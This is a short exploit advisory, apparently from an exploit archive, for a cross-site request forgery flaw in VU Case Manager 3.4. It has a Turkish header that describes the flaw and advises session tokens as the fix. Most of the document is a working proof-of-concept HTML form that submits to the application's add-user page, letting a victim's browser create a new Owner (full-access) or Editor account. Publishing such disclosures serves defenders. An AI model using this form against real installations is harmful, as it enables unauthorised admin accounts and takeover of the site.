< ------------------- header data start ------------------- >

#############################################################

# Application Name :VU Case Manager 3.4

# vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak admin veya user eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form name=NEWUSER method=post action=http://localhost/casemng/add_to_newuser.asp onsubmit=return CheckForm()>



<table width=575 border=0 cellspacing=0 cellpadding=5 bordercolor=white>

<tr>

<td width=139 bgcolor=f5f5f5> <div align=right>*User Logon Name:</div></td>

<td width=416> <input type=text name=username maxlength=20 size=20>

</td>

</tr>

<tr>

<td width=139 bgcolor=f5f5f5> <div align=right>*User password:</div></td>



<td width=416> <input type=password name=userpassword size=20 maxlength=20>

</td>

</tr>

<tr>

<td colspan=2><strong><font color=#990000 size=1 face=Verdana, Arial, Helvetica, sans-serif>select

one of the following:</font></strong></td>

</tr>

<tr>

<td width=139 bgcolor=f5f5f5> <div align=right>*User Full Name:</div></td>



<td width=416> <p>

<input type=text name=userfullname size=30 maxlength=50>

ex.: John Smith</p></td>

</tr>

<tr>

<td bgcolor=f5f5f5> </td>

<td><font size=1 face=Verdana, Arial, Helvetica, sans-serif><strong>Note:

the name will always appear in the list of staff to be selected

for the case assignment</strong></font></td>

</tr>



<tr>

<td bgcolor=f5f5f5><div align=right>*Assign Level:</div></td>

<td> <select name=userlevel>

<option value=>--select Role--</option>

<option value=3>Owner</option>

<option value=2>Editor</option>

</select></td>



</tr>

<tr>

<td bgcolor=f5f5f5> </td>

<td><font size=1 face=Verdana, Arial, Helvetica, sans-serif><strong>Owner

= full access (manager)<br>

Editor = full access but limited to deletion (staff)</strong></font></td>

</tr>

<tr>

<td width=139> <div align=left><font color=#FF0000><strong>OR</strong></font></div></td>



<td width=416><font size=1 face=Verdana, Arial, Helvetica, sans-serif> </font></td>

</tr>

<tr>

<td bgcolor=f5f5f5><div align=right>*Client Name:</div></td>

<td><input type=text name=client size=40 maxlength=50> <!--onBlur=return CheckLevel();-->

ex.: Microsoft Corp.</td>

</tr>

<tr>

<td bgcolor=f5f5f5> </td>



<td><font size=1 face=Verdana, Arial, Helvetica, sans-serif><strong>Note:

client’s name will appear in the list of companies while entering

inventory items</strong></font></td>

</tr>

</table>
<p>

<input type=submit name=Submit value=Submit>

<input type=reset name=Reset value=Reset>

</p>

</form>

< -- bug code end of -- >